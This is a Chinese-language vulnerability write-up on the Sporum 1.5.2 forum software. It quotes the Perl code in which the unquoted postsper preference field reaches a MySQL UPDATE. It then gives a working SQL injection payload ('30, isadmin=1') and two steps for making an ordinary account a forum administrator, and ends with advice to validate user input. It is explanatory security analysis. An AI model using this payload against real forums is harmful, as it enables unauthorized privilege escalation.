如何成为Sporum论坛的管理员

   by stardust <stardust@xfocus.org>

   前几天在网上瞎逛,撞进了一个介绍Linux的站点,站点本身制作平平,但它有一个看起来还不错的论坛.页面的底部提供了一个叫"Powered by Sporum1.5.2"的链接,指向论坛程序的官方主页.从那里我知道了Sporum是用Perl写的,以MySQL为后台数据库,注册用户可以在论坛发贴子,允许用户订制自己的偏好,并以cookies进行身份验证.这个使我不由得想到了wwwthreads这个著名的论坛程序,从架构和功能上Sporum都和它很相似.而在此不久之前,wwwthreads已被发现有安全漏洞,可以使任何普通用户成为论坛的管理员.这使著名的安全资源站点packetstorm遭了殃,导致它使用了wwwthreads的论坛被人劫持.想了解更多的细节,你可以读一下:

   http://packetstorm.securify.com/0002-exploits/rfp2k01.txt

   在这里rfp描述了他如何hack了论坛以及对基于WEB的数据库系统的分析,很有启发性,值得一读.rfp在他的文章里指出wwwthreads的安全漏洞在于没有对从表单来的用户输入进行全面的检查.既然Sporum那么象wwwthreads,会不会也存在相似的问题呢?

   好,那么让我们来看看吧,从linuxberg很容易地可以得到Sporum的1.5.2版.和wwwthreads一样,Sporum允许用户订制自己的偏好你可以订制贴子如何显示,如何排列.wwwthreads正是死在这,那么Sporum呢?在User.pm的可以找到相关的程序片断:

   sub save_preferences1{

   my ($self, $STATE) = @_;

   my ($STATE, $spdb) = map{ $self->{$_} } qw(STATE spdb);

   my $DBH = $spdb->{'dbh'};

   my ($postsper, $myuid, $uid, $prev_op) =

   map{ $STATE->{$_} } qw(mypostsper myuid uid prev_op);

   # --- check the uid --- thanks Tim W from solutionscripts.com

   # --- if uid ne myuid

   if($uid != $myuid){

   # --- need admin right to change the profile

   my ($isadmin) = $spdb->db_select_cols("isadmin", "Users", "uid=$uid");

   if(!$isadmin){

   return (0, $lang->{'not_allow_edit'}, "", "$config->{'cgidir'}/user.cgi");

   }

   }

   my ($sigq, $sortq, $displayq, $viewq, $cookieexpireq) =

   map{ $DBH->quote($STATE->{$_}) } <------ 在用户输入的数据外面套上' '

   qw(mysig mysort mydisplay myview cookieexpire);

   my $data = {('sig'=>$sigq,

   'sort'=>$sortq, 'display'=>$displayq,

   'view'=>$viewq, 'postsper'=>$postsper, <------看这,是不是有点特别

   'cookieexpire'=>$cookieexpireq)};

   my ($succ, $errmsg) = $spdb->db_update("Users", $data, "uid=$myuid");

   my $uri = "$config->{'cgidir'}/user.cgi";

   if($prev_op eq "modifyuser"){

   $uri = "$config->{'cgidir'}/admin.cgi";

   }

   return (0, $errmsg) if !$succ;

   return (1, $lang->{'profile_modified2'}, $lang->{'profile_modified1'}, $uri);

   }

   哈哈,果然不出所料,看出问题出在那了吗?程序会根据你的输入更新数据库,更新的字段有sig,sort,view,display,cookieexpire和postsper,其中前五个字段在数据库中是字符型的,虽然程序没对其做什么检查,但它会在它们外面套上' ',这样用户的输入将不会影响到后来的数据库更新操作.可是postper字段不同,它是数值型的,程序忘记给它穿外套了,看起来我们机会来了.

   $spdb->db_update("Users", $data, "uid=$myuid");

   这个语句的功能是其实就是,根据提供给它的参数生成一个MySQL的Update命令然后交给MySQL去执行.假如我们提交给表单的数据是这样的:

   sort="date desc",theme=NULL,view="collapsed",sig="",display="threaded", cookieexpire="+1d",uid=1246,postsper=30

   那么转换出来的Update语句会是这样的:

   UPDATE Users SET postsper=30, sort='date desc', theme=NULL, view='collapsed', sig='', display='threaded', cookieexpire='+1d' WHERE uid=1246

   我们看到postsper=30没有套上' '外套.这是正常的情况,没什么害处.但是如果postsper的值是这样的呢:"30, somecols=newvalue",那么转换出来的Update语句就变成了:

   UPDATE Users SET postsper=30, somecols=newvalue, sort='date desc', theme=NULL,

   ~~~~~~~~~~~~~~~~~~~~~\

   我们的输入

   view='collapsed', sig='', display='threaded', cookieexpire='+1d' WHERE uid=1246

   这将允许我们修改uid=1246这个用户的任意字段!其实利用postsper，我们可以修改任意用户的任意字段.假设一下postsper="30,somecol=newvalue where uid=other's_id #"，那么相应的Update语句就是这样的:

   UPDATE Users SET postsper=30,somecol=newvalue where uid=other's_id #, sort='date desc',

   theme=NULL, view='collapsed', sig='', display='threaded', cookieexpire='+1d'

   WHERE uid=1246

   因为MySQL将#后的内容作为注释忽略掉,实际执行的是#以前的部分.这样我们其实可以修改Users表中的任意字段.好了,说了这么多,到底修改哪个字段,能使我们成为管理员呢?看一下Users表的结构就知道了:

   CREATE TABLE Users(

   uid INT(11) NOT NULL, # --- user id

   username CHAR(30) NOT NULL, # --- username

   passwd CHAR(50) NOT NULL, # --- password

   nickname CHAR(50) NOT NULL, # --- nickname

   realname CHAR(50), # --- real name

   realemail CHAR(50), # --- real email

   fakeemail CHAR(50), # --- fake email

   homepage CHAR(100), # --- homepage

   bio TEXT, # --- bio

   sig TEXT, # --- sig

   icq VARCHAR(50), # --- icq

   sort VARCHAR(20)

   DEFAULT "date desc", # --- sort

   display CHAR(11)

   DEFAULT "threaded", # --- display mode

   view CHAR(10)

   DEFAULT "collapsed", # --- view mode

   postsper INT(11) DEFAULT 10, # --- posts per page

   lastlogon DATETIME NOT NULL, # --- last logon

   active INT(1) NOT NULL # --- status - 0, 1, 2

   DEFAULT 0,

   peek INT(11) UNSIGNED NOT NULL,# --- hits on the user profile

   registered DATETIME NOT NULL, # --- registered on

   cookieexpire CHAR(5) NOT NULL # --- login cookie expire

   DEFAULT '+1d',

   isadmin INT(1) NOT NULL # --- is user a admin? <------在这儿呢

   DEFAULT 0,

   # --- 8/27/99

   location VARCHAR(150), # --- user location

   photourl VARCHAR(150), # --- location of photo

   privlev INT(1) NOT NULL, # --- privacy level

   # --- 8/30/99

   theme VARCHAR(100) NOT NULL # --- theme

   DEFAULT "default",

   # --- 9/12/99

   lastresp DATETIME NOT NULL, # --- last response

   PRIMARY KEY (uid, username),

   INDEX index1 (uid),

   INDEX index2 (username)

   );

   把postsper的值设成"30, isadmin=1",程序就会把我们更新成管理员了,是不是很不错?

   简单总结一下如何成为Sporum论坛的管理员:

   1. 注册一个普通用户

   2. 登录后进入修改个人偏好表单,在postsper输入框中填入"30, isadmin=1",按"save".

   你就成为管理员了.

   结论:开发cgi程序一定要全面地检查用户的输入,不要想当然的认为用户会输入合法的数据给你,不这样做,是拿安全在冒险.